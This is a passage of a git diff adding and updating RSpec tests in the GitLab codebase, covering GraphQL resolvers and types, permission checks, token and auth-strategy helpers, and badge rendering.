create(:cluster_agent) } + + let(:user) { create(:user, maintainer_projects: [agent.project]) } + let(:ctx) { { current_user: user } } + let(:events) { double } + + before do + allow(agent).to receive(:activity_events).and_return(events) + end + + subject { resolve(described_class, obj: agent, ctx: ctx) } + + it 'returns events associated with the agent' do + expect(subject).to eq(events) + end + + context 'user does not have permission' do + let(:user) { create(:user, developer_projects: [agent.project]) } + + it { is_expected.to be_empty } + end + end +end diff --git a/spec/graphql/resolvers/container_repository_tags_resolver_spec.rb b/spec/graphql/resolvers/container_repository_tags_resolver_spec.rb new file mode 100644 index 00000000000..4e7ea253c87 --- /dev/null +++ b/spec/graphql/resolvers/container_repository_tags_resolver_spec.rb @@ -0,0 +1,54 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::ContainerRepositoryTagsResolver do + include GraphqlHelpers + + let_it_be(:user) { create(:user) } + let_it_be(:project) { create(:project, :public) } + let_it_be_with_reload(:repository) { create(:container_repository, project: project) } + + let(:args) { { sort: nil } } + + describe '#resolve' do + let(:resolver) { resolve(described_class, ctx: { current_user: user }, obj: repository, args: args) } + + before do + stub_container_registry_config(enabled: true) + end + + context 'by name' do + subject { resolver.map(&:name) } + + before do + stub_container_registry_tags(repository: repository.path, tags: %w(aaa bab bbb ccc 123), with_manifest: false) + end + + context 'without sort' do + # order is not guaranteed + it { is_expected.to contain_exactly('aaa', 'bab', 'bbb', 'ccc', '123') } + end + + context 'with sorting and filtering' do + context "name_asc" do + let(:args) { { sort: :name_asc } } + + it { is_expected.to eq(%w(123 aaa bab bbb ccc)) } + end + + context "name_desc" do + let(:args) { { sort: :name_desc } } + + it { is_expected.to eq(%w(ccc bbb bab aaa 123)) } + end + + context 'filter by name' do + let(:args) { { sort: :name_desc, name: 'b' } } + + it { is_expected.to eq(%w(bbb bab)) } + end + end + end + end +end diff --git a/spec/graphql/resolvers/package_pipelines_resolver_spec.rb b/spec/graphql/resolvers/package_pipelines_resolver_spec.rb new file mode 100644 index 00000000000..d48d4d8ae01 --- /dev/null +++ b/spec/graphql/resolvers/package_pipelines_resolver_spec.rb @@ -0,0 +1,84 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::PackagePipelinesResolver do + include GraphqlHelpers + + let_it_be_with_reload(:package) { create(:package) } + let_it_be(:pipelines) { create_list(:ci_pipeline, 3, project: package.project) } + + let(:user) { package.project.owner } + let(:args) { {} } + + describe '#resolve' do + subject { resolve(described_class, obj: package, args: args, ctx: { current_user: user }) } + + before do + package.pipelines = pipelines + package.save! + end + + it { is_expected.to contain_exactly(*pipelines) } + + context 'with invalid after' do + let(:args) { { first: 1, after: 'not_json_string' } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'with invalid after key' do + let(:args) { { first: 1, after: encode_cursor(foo: 3) } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'with invalid before' do + let(:args) { { last: 1, before: 'not_json_string' } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'with invalid before key' do + let(:args) { { last: 1, before: encode_cursor(foo: 3) } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'field options' do + let(:field) do + field_options = described_class.field_options.merge( + owner: resolver_parent, + name: 'dummy_field' + ) + ::Types::BaseField.new(**field_options) + end + + it 'sets them properly' do + expect(field).not_to be_connection + expect(field.extras).to match_array([:lookahead]) + end + end + + context 'with unauthorized user' do + let_it_be(:user) { create(:user) } + + it { is_expected.to be_nil } + end + + def encode_cursor(json) + GitlabSchema.cursor_encoder.encode( + Gitlab::Json.dump(json), + nonce: true + ) + end + end +end diff --git a/spec/graphql/resolvers/users/participants_resolver_spec.rb b/spec/graphql/resolvers/users/participants_resolver_spec.rb new file mode 100644 index 00000000000..3f04d157410 --- /dev/null +++ b/spec/graphql/resolvers/users/participants_resolver_spec.rb @@ -0,0 +1,83 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::Users::ParticipantsResolver do + include GraphqlHelpers + + describe '#resolve' do + let_it_be(:user) { create(:user) } + let_it_be(:guest) { create(:user) } + let_it_be(:project) { create(:project, :public) } + let_it_be(:issue) { create(:issue, project: project) } + let_it_be(:note) do + create( + :note, + :system, + :confidential, + project: project, + noteable: issue, + author: create(:user) + ) + end + + let_it_be(:note_metadata) { create(:system_note_metadata, note: note) } + + subject(:resolved_items) { resolve(described_class, args: {}, ctx: { current_user: current_user }, obj: issue)&.items } + + before do + project.add_guest(guest) + project.add_developer(user) + end + + context 'when current user is not set' do + let(:current_user) { nil } + + it 'returns only publicly visible participants for this user' do + is_expected.to match_array([issue.author]) + end + end + + context 'when current user does not have enough permissions' do + let(:current_user) { guest } + + it 'returns only publicly visible participants for this user' do + is_expected.to match_array([issue.author]) + end + end + + context 'when current user has access to confidential notes' do + let(:current_user) { user } + + it 'returns all participants for this user' do + is_expected.to match_array([issue.author, note.author]) + end + + context 'N+1 queries' do + let(:query) { -> { resolve(described_class, args: {}, ctx: { current_user: current_user }, obj: issue)&.items } } + + before do + # warm-up + query.call + end + + it 'does not execute N+1 for project relation' do + control_count = ActiveRecord::QueryRecorder.new { query.call } + + create(:note, :confidential, project: project, noteable: issue, author: create(:user)) + + expect { query.call }.not_to exceed_query_limit(control_count) + end + + it 'does not execute N+1 for system note metadata relation' do + control_count = ActiveRecord::QueryRecorder.new { query.call } + + new_note = create(:note, :system, project: project, noteable: issue, author: create(:user)) + create(:system_note_metadata, note: new_note) + + expect { query.call }.not_to exceed_query_limit(control_count) + end + end + end + end +end diff --git a/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb b/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb index d1c2b4044c1..37c9d6b269c 100644 --- a/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb +++ b/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb @@ -36,8 +36,14 @@ RSpec.describe GitlabSchema.types['UsageTrendsMeasurement'] do end context 'when the user is not admin' do - it 'returns no data' do - expect(subject.dig('data', 'usageTrendsMeasurements')).to be_nil + it 'returns an error' do + expected_err = "The resource that you are attempting to access does not exist or you don't have permission to perform this action" + + expect(subject["errors"].first["message"]).to eq(expected_err) + end + + it 'does not return usageTrendsMeasurements data' do + expect(subject["data"]["usageTrendsMeasurements"]).to be_nil end end @@ -48,7 +54,7 @@ RSpec.describe GitlabSchema.types['UsageTrendsMeasurement'] do stub_application_setting(admin_mode: false) end - it 'returns data' do + it 'returns usageTrendsMeasurements data' do expect(subject.dig('data', 'usageTrendsMeasurements', 'nodes')).not_to be_empty end end diff --git a/spec/graphql/types/base_edge_spec.rb b/spec/graphql/types/base_edge_spec.rb new file mode 100644 index 00000000000..3afb4202173 --- /dev/null +++ b/spec/graphql/types/base_edge_spec.rb @@ -0,0 +1,76 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Types::BaseEdge do + include GraphqlHelpers + + let_it_be(:test_schema) do + project_edge_type = Class.new(described_class) do + field :proof_of_admin_rights, String, + null: true, authorize: :admin_project + + def proof_of_admin_rights + 'ok' + end + end + + project_type = Class.new(::Types::BaseObject) do + graphql_name 'Project' + authorize :read_project + edge_type_class project_edge_type + + field :name, String, null: false + end + + Class.new(GraphQL::Schema) do + lazy_resolve ::Gitlab::Graphql::Lazy, :force + use ::GraphQL::Pagination::Connections + use ::Gitlab::Graphql::Pagination::Connections + + query(Class.new(::Types::BaseObject) do + graphql_name 'Query' + field :projects, project_type.connection_type, null: false + + def projects + context[:projects] + end + end) + end + end + + def document + GraphQL.parse(<<~GQL) + query { + projects { + edges { + proofOfAdminRights + node { name } + } + } + } + GQL + end + + it 'supports field authorization on edge fields' do + user = create(:user) + private_project = create(:project, :private) + member_project = create(:project, :private) + maintainer_project = create(:project, :private) + public_project = create(:project, :public) + + member_project.add_developer(user) + maintainer_project.add_maintainer(user) + projects = [private_project, member_project, maintainer_project, public_project] + + data = { current_user: user, projects: projects } + query = GraphQL::Query.new(test_schema, document: document, context: data) + result = query.result.to_h + + expect(graphql_dig_at(result, 'data', 'projects', 'edges', 'node', 'name')) + .to contain_exactly(member_project.name, maintainer_project.name, public_project.name) + + expect(graphql_dig_at(result, 'data', 'projects', 'edges', 'proofOfAdminRights')) + .to contain_exactly(nil, 'ok', nil) + end +end diff --git a/spec/graphql/types/boards/board_issue_input_type_spec.rb b/spec/graphql/types/boards/board_issue_input_type_spec.rb index 5d3efb9b40d..ed2872c3598 100644 --- a/spec/graphql/types/boards/board_issue_input_type_spec.rb +++ b/spec/graphql/types/boards/board_issue_input_type_spec.rb @@ -7,7 +7,7 @@ RSpec.describe GitlabSchema.types['BoardIssueInput'] do it 'has specific fields' do allowed_args = %w(labelName milestoneTitle assigneeUsername authorUsername - releaseTag myReactionEmoji not search assigneeWildcardId) + releaseTag myReactionEmoji not search assigneeWildcardId confidential) expect(described_class.arguments.keys).to include(*allowed_args) expect(described_class.arguments['not'].type).to eq(Types::Boards::NegatedBoardIssueInputType) diff --git a/spec/graphql/types/ci/job_need_union_spec.rb b/spec/graphql/types/ci/job_need_union_spec.rb new file mode 100644 index 00000000000..49df9ddc7eb --- /dev/null +++ b/spec/graphql/types/ci/job_need_union_spec.rb @@ -0,0 +1,43 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Types::Ci::JobNeedUnion do + describe '.resolve_type' do + context 'when resolving a build need' do + it 'resolves to a BuildNeedType' do + resolved_type = described_class.resolve_type(build(:ci_build_need), {}) + + expect(resolved_type).to be(Types::Ci::BuildNeedType) + end + end + + context 'when resolving a build' do + it 'resolves to a JobType' do + resolved_type = described_class.resolve_type(build(:ci_build), {}) + + expect(resolved_type).to be(Types::Ci::JobType) + end + end + + context 'when resolving an unrelated object' do + it 'raises a TypeNotSupportedError for string object' do + expect do + described_class.resolve_type(+'unrelated object', {}) + end.to raise_error(Types::Ci::JobNeedUnion::TypeNotSupportedError) + end + + it 'raises a TypeNotSupportedError for nil object' do + expect do + described_class.resolve_type(nil, {}) + end.to raise_error(Types::Ci::JobNeedUnion::TypeNotSupportedError) + end + + it 'raises a TypeNotSupportedError for other CI object' do + expect do + described_class.resolve_type(build(:ci_pipeline), {}) + end.to raise_error(Types::Ci::JobNeedUnion::TypeNotSupportedError) + end + end + end +end diff --git a/spec/graphql/types/ci/job_token_scope_type_spec.rb b/spec/graphql/types/ci/job_token_scope_type_spec.rb index 19a8cc324f9..43225b2089b 100644 --- a/spec/graphql/types/ci/job_token_scope_type_spec.rb +++ b/spec/graphql/types/ci/job_token_scope_type_spec.rb @@ -12,7 +12,7 @@ RSpec.describe GitlabSchema.types['CiJobTokenScopeType'] do end describe 'query' do - let_it_be(:project) { create(:project, ci_job_token_scope_enabled: true).tap(&:save!) } + let(:project) { create(:project, ci_job_token_scope_enabled: true).tap(&:save!) } let_it_be(:current_user) { create(:user) } let(:query) do @@ -65,8 +65,12 @@ RSpec.describe GitlabSchema.types['CiJobTokenScopeType'] do project.ci_cd_settings.update!(job_token_scope_enabled: false) end + it 'does not return an error' do + expect(subject['errors']).to be_nil + end + it 'returns nil' do - expect(subject.dig('data', 'project', 'ciJobTokenScope')).to be_nil + expect(subject['data']['project']['ciJobTokenScope']).to be_nil end end end diff --git a/spec/graphql/types/ci/job_type_spec.rb b/spec/graphql/types/ci/job_type_spec.rb index e95a7da4fe5..e3cb56c2ad5 100644 --- a/spec/graphql/types/ci/job_type_spec.rb +++ b/spec/graphql/types/ci/job_type_spec.rb @@ -25,6 +25,7 @@ RSpec.describe Types::Ci::JobType do needs pipeline playable + previousStageJobsOrNeeds queued_at queued_duration refName diff --git a/spec/graphql/types/clusters/agent_activity_event_type_spec.rb b/spec/graphql/types/clusters/agent_activity_event_type_spec.rb new file mode 100644 index 00000000000..7773bad749d --- /dev/null +++ b/spec/graphql/types/clusters/agent_activity_event_type_spec.rb @@ -0,0 +1,11 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe GitlabSchema.types['ClusterAgentActivityEvent'] do + let(:fields) { %i[recorded_at kind level user agent_token] } + + it { expect(described_class.graphql_name).to eq('ClusterAgentActivityEvent') } + it { expect(described_class).to require_graphql_authorizations(:admin_cluster) } + it { expect(described_class).to have_graphql_fields(fields) } +end diff --git a/spec/graphql/types/clusters/agent_type_spec.rb b/spec/graphql/types/clusters/agent_type_spec.rb index 4b4b601b230..a1e5952bf73 100644 --- a/spec/graphql/types/clusters/agent_type_spec.rb +++ b/spec/graphql/types/clusters/agent_type_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe GitlabSchema.types['ClusterAgent'] do - let(:fields) { %i[created_at created_by_user id name project updated_at tokens web_path connections] } + let(:fields) { %i[created_at created_by_user id name project updated_at tokens web_path connections activity_events] } it { expect(described_class.graphql_name).to eq('ClusterAgent') } diff --git a/spec/graphql/types/container_respository_tags_sort_enum_spec.rb b/spec/graphql/types/container_respository_tags_sort_enum_spec.rb new file mode 100644 index 00000000000..b464037d8d9 --- /dev/null +++ b/spec/graphql/types/container_respository_tags_sort_enum_spec.rb @@ -0,0 +1,13 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe GitlabSchema.types['ContainerRepositoryTagSort'] do + specify { expect(described_class.graphql_name).to eq('ContainerRepositoryTagSort') } + + it 'exposes all the existing issue sort values' do + expect(described_class.values.keys).to include( + *%w[NAME_ASC NAME_DESC] + ) + end +end diff --git a/spec/graphql/types/issue_type_enum_spec.rb b/spec/graphql/types/issue_type_enum_spec.rb index 7ae5eb76f28..131e92aa5ed 100644 --- a/spec/graphql/types/issue_type_enum_spec.rb +++ b/spec/graphql/types/issue_type_enum_spec.rb @@ -5,9 +5,9 @@ require 'spec_helper' RSpec.describe Types::IssueTypeEnum do specify { expect(described_class.graphql_name).to eq('IssueType') } - it 'exposes all the existing issue type values' do - expect(described_class.values.keys).to include( - *%w[ISSUE INCIDENT] + it 'exposes all the existing issue type values except for task' do + expect(described_class.values.keys).to match_array( + %w[ISSUE INCIDENT TEST_CASE REQUIREMENT] ) end end diff --git a/spec/graphql/types/issue_type_spec.rb b/spec/graphql/types/issue_type_spec.rb index c0a0fdf3b0b..1b8bf007a73 100644 --- a/spec/graphql/types/issue_type_spec.rb +++ b/spec/graphql/types/issue_type_spec.rb @@ -66,10 +66,16 @@ RSpec.describe GitlabSchema.types['Issue'] do end context 'when user does not have the permission' do - it 'returns no data' do + before do allow(Ability).to receive(:allowed?).with(user, :read_project, project).and_return(false) + end - expect(subject.dig(:data, :project)).to eq(nil) + it 'does not return an error' do + expect(subject['errors']).to be_nil + end + + it 'returns no data' do + expect(subject['data']['project']).to be_nil end end diff --git a/spec/graphql/types/packages/package_details_type_spec.rb b/spec/graphql/types/packages/package_details_type_spec.rb index 7e1103d8aa0..f0b684d6b07 100644 --- a/spec/graphql/types/packages/package_details_type_spec.rb +++ b/spec/graphql/types/packages/package_details_type_spec.rb @@ -10,4 +10,13 @@ RSpec.describe GitlabSchema.types['PackageDetailsType'] do expect(described_class).to include_graphql_fields(*expected_fields) end + + it 'overrides the pipelines field' do + field = described_class.fields['pipelines'] + + expect(field).to have_graphql_type(Types::Ci::PipelineType.connection_type) + expect(field).to have_graphql_extension(Gitlab::Graphql::Extensions::ExternallyPaginatedArrayExtension) + expect(field).to have_graphql_resolver(Resolvers::PackagePipelinesResolver) + expect(field).not_to be_connection + end end diff --git a/spec/graphql/types/project_type_spec.rb b/spec/graphql/types/project_type_spec.rb index 4f205e861dd..adf5507571b 100644 --- a/spec/graphql/types/project_type_spec.rb +++ b/spec/graphql/types/project_type_spec.rb @@ -34,7 +34,7 @@ RSpec.describe GitlabSchema.types['Project'] do container_repositories container_repositories_count pipeline_analytics squash_read_only sast_ci_configuration cluster_agent cluster_agents agent_configurations - ci_template timelogs merge_commit_template + ci_template timelogs merge_commit_template squash_commit_template ] expect(described_class).to include_graphql_fields(*expected_fields) diff --git a/spec/graphql/types/range_input_type_spec.rb b/spec/graphql/types/range_input_type_spec.rb index ca27527c2b5..fc9126247fa 100644 --- a/spec/graphql/types/range_input_type_spec.rb +++ b/spec/graphql/types/range_input_type_spec.rb @@ -24,7 +24,7 @@ RSpec.describe ::Types::RangeInputType do it 'follows expected subtyping relationships for instances' do context = GraphQL::Query::Context.new( - query: OpenStruct.new(schema: nil), + query: double('query', schema: nil), values: {}, object: nil ) diff --git a/spec/graphql/types/repository/blob_type_spec.rb b/spec/graphql/types/repository/blob_type_spec.rb index 7f37237f355..21bc88e34c0 100644 --- a/spec/graphql/types/repository/blob_type_spec.rb +++ b/spec/graphql/types/repository/blob_type_spec.rb @@ -24,10 +24,12 @@ RSpec.describe Types::Repository::BlobType do :raw_path, :replace_path, :pipeline_editor_path, + :code_owners, :simple_viewer, :rich_viewer, :plain_data, :can_modify_blob, + :can_current_user_push_to_branch, :ide_edit_path, :external_storage_url, :fork_and_edit_path, diff --git a/spec/graphql/types/subscription_type_spec.rb b/spec/graphql/types/subscription_type_spec.rb index b99df374bb3..bf933945a31 100644 --- a/spec/graphql/types/subscription_type_spec.rb +++ b/spec/graphql/types/subscription_type_spec.rb @@ -6,6 +6,7 @@ RSpec.describe GitlabSchema.types['Subscription'] do it 'has the expected fields' do expected_fields = %i[ issuable_assignees_updated + issue_crm_contacts_updated ] expect(described_class).to have_graphql_fields(*expected_fields).only diff --git a/spec/graphql/types/user_callout_feature_name_enum_spec.rb b/spec/graphql/types/user_callout_feature_name_enum_spec.rb index 28755e1301b..5dfcfc21708 100644 --- a/spec/graphql/types/user_callout_feature_name_enum_spec.rb +++ b/spec/graphql/types/user_callout_feature_name_enum_spec.rb @@ -6,6 +6,6 @@ RSpec.describe GitlabSchema.types['UserCalloutFeatureNameEnum'] do specify { expect(described_class.graphql_name).to eq('UserCalloutFeatureNameEnum') } it 'exposes all the existing user callout feature names' do - expect(described_class.values.keys).to match_array(::UserCallout.feature_names.keys.map(&:upcase)) + expect(described_class.values.keys).to match_array(::Users::Callout.feature_names.keys.map(&:upcase)) end end diff --git a/spec/helpers/access_tokens_helper_spec.rb b/spec/helpers/access_tokens_helper_spec.rb index 28041203447..c2c918bc6b0 100644 --- a/spec/helpers/access_tokens_helper_spec.rb +++ b/spec/helpers/access_tokens_helper_spec.rb @@ -15,4 +15,53 @@ RSpec.describe AccessTokensHelper do it { expect(helper.scope_description(prefix)).to eq(description_location) } end end + + describe '#tokens_app_data' do + let_it_be(:feed_token) { 'DUKu345VD73Py7zz3z89' } + let_it_be(:incoming_email_token) { 'az4a2l5f8ssa0zvdfbhidbzlx' } + let_it_be(:static_object_token) { 'QHXwGHYioHTgxQnAcyZ-' } + let_it_be(:feed_token_reset_path) { '/-/profile/reset_feed_token' } + let_it_be(:incoming_email_token_reset_path) { '/-/profile/reset_incoming_email_token' } + let_it_be(:static_object_token_reset_path) { '/-/profile/reset_static_object_token' } + let_it_be(:user) do + build( + :user, + feed_token: feed_token, + incoming_email_token: incoming_email_token, + static_object_token: static_object_token + ) + end + + it 'returns expected json' do + allow(Gitlab::CurrentSettings).to receive_messages( + disable_feed_token: false, + static_objects_external_storage_enabled?: true + ) + allow(Gitlab::IncomingEmail).to receive(:supports_issue_creation?).and_return(true) + allow(helper).to receive_messages( + current_user: user, + reset_feed_token_profile_path: feed_token_reset_path, + reset_incoming_email_token_profile_path: incoming_email_token_reset_path, + reset_static_object_token_profile_path: static_object_token_reset_path + ) + + expect(helper.tokens_app_data).to eq({ + feed_token: { + enabled: true, + token: feed_token, + reset_path: feed_token_reset_path + }, + incoming_email_token: { + enabled: true, + token: incoming_email_token, + reset_path: incoming_email_token_reset_path + }, + static_object_token: { + enabled: true, + token: static_object_token, + reset_path: static_object_token_reset_path + } + }.to_json) + end + end end diff --git a/spec/helpers/application_helper_spec.rb b/spec/helpers/application_helper_spec.rb index 7e3f665a99c..7390b9b3f58 100644 --- a/spec/helpers/application_helper_spec.rb +++ b/spec/helpers/application_helper_spec.rb @@ -192,20 +192,6 @@ RSpec.describe ApplicationHelper do end end - describe '#contact_sales_url' do - subject { helper.contact_sales_url } - - it 'returns the url' do - is_expected.to eq("https://#{helper.promo_host}/sales") - end - - it 'changes if promo_url changes' do - allow(helper).to receive(:promo_url).and_return('https://somewhere.else') - - is_expected.to eq('https://somewhere.else/sales') - end - end - describe '#support_url' do context 'when alternate support url is specified' do let(:alternate_url) { 'http://company.example.com/getting-help' } diff --git a/spec/helpers/auth_helper_spec.rb b/spec/helpers/auth_helper_spec.rb index c1c961c5cbb..b481c214ca1 100644 --- a/spec/helpers/auth_helper_spec.rb +++ b/spec/helpers/auth_helper_spec.rb @@ -283,35 +283,84 @@ RSpec.describe AuthHelper do before do allow(Gitlab).to receive(:com?).and_return(is_gitlab_com) - stub_config(extra: { google_tag_manager_id: 'key' }) allow(helper).to receive(:current_user).and_return(user) end - subject(:google_tag_manager_enabled?) { helper.google_tag_manager_enabled? } - - context 'on gitlab.com and a key set without a current user' do - it { is_expected.to be_truthy } - end + subject(:google_tag_manager_enabled) { helper.google_tag_manager_enabled? } context 'when not on gitlab.com' do let(:is_gitlab_com) { false } - it { is_expected.to be_falsey } + it { is_expected.to eq(false) } end - context 'when current user is set' do - let(:user) { instance_double('User') } + context 'regular and nonce versions' do + using RSpec::Parameterized::TableSyntax - it { is_expected.to be_falsey } + where(:gtm_nonce_enabled, :gtm_key) do + false | 'google_tag_manager_id' + true | 'google_tag_manager_nonce_id' + end + + with_them do + before do + stub_feature_flags(gtm_nonce: gtm_nonce_enabled) + stub_config(extra: { gtm_key => 'key' }) + end + + context 'on gitlab.com and a key set without a current user' do + it { is_expected.to be_truthy } + end + + context 'when current user is set' do + let(:user) { instance_double('User') } + + it { is_expected.to eq(false) } + end + + context 'when no key is set' do + before do + stub_config(extra: {}) + end + + it { is_expected.to eq(false) } + end + end end + end + + describe '#google_tag_manager_id' do + subject(:google_tag_manager_id) { helper.google_tag_manager_id } - context 'when no key is set' do + before do + stub_config(extra: { 'google_tag_manager_nonce_id': 'nonce', 'google_tag_manager_id': 'gtm' }) + end + + context 'when google tag manager is disabled' do before do - stub_config(extra: {}) + allow(helper).to receive(:google_tag_manager_enabled?).and_return(false) end it { is_expected.to be_falsey } end + + context 'when google tag manager is enabled' do + before do + allow(helper).to receive(:google_tag_manager_enabled?).and_return(true) + end + + context 'when nonce feature flag is enabled' do + it { is_expected.to eq('nonce') } + end + + context 'when nonce feature flag is disabled' do + before do + stub_feature_flags(gtm_nonce: false) + end + + it { is_expected.to eq('gtm') } + end + end end describe '#auth_app_owner_text' do @@ -346,4 +395,170 @@ RSpec.describe AuthHelper do end end end + + describe '#auth_strategy_class' do + subject(:auth_strategy_class) { helper.auth_strategy_class(name) } + + context 'when configuration specifies no provider' do + let(:name) { 'does_not_exist' } + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([]) + end + + it 'returns false' do + expect(auth_strategy_class).to be_falsey + end + end + + context 'when configuration specifies a provider with args but without strategy_class' do + let(:name) { 'google_oauth2' } + let(:provider) do + Struct.new(:name, :args).new( + name, + 'app_id' => 'YOUR_APP_ID' + ) + end + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([provider]) + end + + it 'returns false' do + expect(auth_strategy_class).to be_falsey + end + end + + context 'when configuration specifies a provider with args and strategy_class' do + let(:name) { 'provider1' } + let(:strategy) { 'OmniAuth::Strategies::LDAP' } + let(:provider) do + Struct.new(:name, :args).new( + name, + 'strategy_class' => strategy + ) + end + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([provider]) + end + + it 'returns the class' do + expect(auth_strategy_class).to eq(strategy) + end + end + + context 'when configuration specifies another provider with args and another strategy_class' do + let(:name) { 'provider1' } + let(:strategy) { 'OmniAuth::Strategies::LDAP' } + let(:provider) do + Struct.new(:name, :args).new( + 'another_name', + 'strategy_class' => strategy + ) + end + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([provider]) + end + + it 'returns false' do + expect(auth_strategy_class).to be_falsey + end + end + end + + describe '#saml_providers' do + subject(:saml_providers) { helper.saml_providers } + + let(:saml_strategy) { 'OmniAuth::Strategies::SAML' } + + let(:saml_provider_1_name) { 'saml_provider_1' } + let(:saml_provider_1) do + Struct.new(:name, :args).new( + saml_provider_1_name, + 'strategy_class' => saml_strategy + ) + end + + let(:saml_provider_2_name) { 'saml_provider_2' } + let(:saml_provider_2) do + Struct.new(:name, :args).new( + saml_provider_2_name, + 'strategy_class' => saml_strategy + ) + end + + let(:ldap_provider_name) { 'ldap_provider' } + let(:ldap_strategy) { 'OmniAuth::Strategies::LDAP' } + let(:ldap_provider) do + Struct.new(:name, :args).new( + ldap_provider_name, + 'strategy_class' => ldap_strategy + ) + end + + let(:google_oauth2_provider_name) { 'google_oauth2' } + let(:google_oauth2_provider) do + Struct.new(:name, :args).new( + google_oauth2_provider_name, + 'app_id' => 'YOUR_APP_ID' + ) + end + + context 'when configuration specifies no provider' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([]) + end + + it 'returns an empty list' do + expect(saml_providers).to be_empty + end + end + + context 'when configuration specifies a provider with a SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([saml_provider_1_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([saml_provider_1]) + end + + it 'returns the provider' do + expect(saml_providers).to match_array([saml_provider_1_name]) + end + end + + context 'when configuration specifies two providers with a SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([saml_provider_1_name, saml_provider_2_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([saml_provider_1, saml_provider_2]) + end + + it 'returns the provider' do + expect(saml_providers).to match_array([saml_provider_1_name, saml_provider_2_name]) + end + end + + context 'when configuration specifies a provider with a non-SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([ldap_provider_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([ldap_provider]) + end + + it 'returns an empty list' do + expect(saml_providers).to be_empty + end + end + + context 'when configuration specifies four providers but only two with SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([saml_provider_1_name, ldap_provider_name, saml_provider_2_name, google_oauth2_provider_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([saml_provider_1, ldap_provider, saml_provider_2, google_oauth2_provider]) + end + + it 'returns the provider' do + expect(saml_providers).to match_array([saml_provider_1_name, saml_provider_2_name]) + end + end + end end diff --git a/spec/helpers/badges_helper_spec.rb b/spec/helpers/badges_helper_spec.rb new file mode 100644 index 00000000000..5be3b4a737b --- /dev/null +++ b/spec/helpers/badges_helper_spec.rb @@ -0,0 +1,129 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BadgesHelper do + let(:label) { "Test" } + + describe '#gl_badge_tag' do + it 'creates a badge with given text' do + expect(helper.gl_badge_tag(label)).to match(%r{<span .*>Test</span>}) + end + + describe 'block content' do + it 'renders block content' do + expect(helper.gl_badge_tag { label }).to match(%r{<span .*>Test</span>}) + end + + it 'changes the function signature' do + options = { variant: :danger } + html_options = { class: 'foo-bar' } + + tag = helper.gl_badge_tag(label, options, html_options) + tag_with_block = helper.gl_badge_tag options, html_options do + label + end + + expect(tag).to eql(tag_with_block) + end + end + + it 'adds style classes' do + expect(helper.gl_badge_tag(label)).to match(%r{class="gl-badge badge badge-pill badge-muted md"}) + end + + it 'adds custom classes' do + expect(helper.gl_badge_tag(label, nil, class: "test-class" )).to match(%r{class=".*test-class.*"}) + end + + describe 'variants' do + where(:variant) do + [ + [:muted], + [:neutral], + [:info], + [:success], + [:warning], + [:danger] + ] + end + + with_them do + it 'sets the variant class' do + expected_class = "badge-#{variant}" + expect(helper.gl_badge_tag(label, variant: variant)).to match(%r{class=".*#{expected_class}.*"}) + end + end + + it 'defaults to muted' do + expect(helper.gl_badge_tag(label)).to match(%r{class=".*badge-muted.*"}) + end + + it 'falls back to default given an unknown variant' do + expect(helper.gl_badge_tag(label, variant: :foo)).to match(%r{class=".*badge-muted.*"}) + end + end + + describe 'sizes' do + where(:size) do + [[:sm], [:md], [:lg]] + end + + with_them do + it 'sets the size class' do + expect(helper.gl_badge_tag(label, size: size)).to match(%r{class=".*#{size}.*"}) + end + end + + it 'defaults to md' do + expect(helper.gl_badge_tag(label)).to match(%r{class=".*md.*"}) + end + + it 'falls back to default given an unknown size' do + expect(helper.gl_badge_tag(label, size: :foo)).to match(%r{class=".*md.*"}) + end + end + + it 'applies custom html attributes' do + expect(helper.gl_badge_tag(label, nil, data: { foo: "bar" })).to match(%r{<span .*data-foo="bar".*>}) + end + + describe 'icons' do + let(:spacing_class_regex) { %r{<svg .*class=".*gl-mr-2.*".*>.*</svg>} } + + describe 'with text' do + subject { helper.gl_badge_tag(label, icon: "question-o") } + + it 'renders an icon' do + expect(subject).to match(%r{<svg .*#question-o".*>.*</svg>}) + end + + it 'adds a spacing class to the icon' do + expect(subject).to match(spacing_class_regex) + end + end + + describe 'icon only' do + subject { helper.gl_badge_tag(label, icon: 'question-o', icon_only: true) } + + it 'adds an img role to element' do + expect(subject).to match(%r{<span .*role="img".*>}) + end + + it 'adds aria-label to element' do + expect(subject).to match(%r{<span .*aria-label="#{label}".*>}) + end + + it 'does not add a spacing class to the icon' do + expect(subject).not_to match(spacing_class_regex) + end + end + end + + describe 'given an href' do + it 'creates a badge link' do + expect(helper.gl_badge_tag(label, nil, href: 'foo')).to match(%r{<a .*href="foo".*>}) + end + end + end +end diff --git 